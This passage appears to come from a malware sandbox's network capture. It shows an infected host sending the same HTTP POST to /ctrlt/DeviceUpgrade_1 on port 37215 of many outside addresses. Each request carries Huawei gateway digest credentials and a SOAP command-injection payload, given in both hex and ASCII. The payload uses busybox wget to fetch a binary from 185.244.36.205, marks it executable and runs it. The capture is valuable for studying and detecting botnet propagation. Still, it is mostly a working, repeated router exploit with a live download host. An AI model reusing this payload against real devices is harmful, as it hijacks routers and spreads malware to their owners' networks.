                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1731192.168.2.1546194102.196.193.24737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.945547104 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1732192.168.2.1539218122.196.73.15037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.945554972 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1733192.168.2.1548236157.219.135.22737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.945564985 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1734192.168.2.1560670156.128.135.19037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.945589066 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1735192.168.2.1535464138.42.147.20337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.945611954 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1736192.168.2.1536966190.246.153.15937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.945631027 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1737192.168.2.1555146157.63.17.19037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.945677996 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1738192.168.2.1551480157.83.187.18137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.945697069 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1739192.168.2.155389637.116.134.9437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.945702076 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1740192.168.2.1539658102.139.141.22237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:21.945714951 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
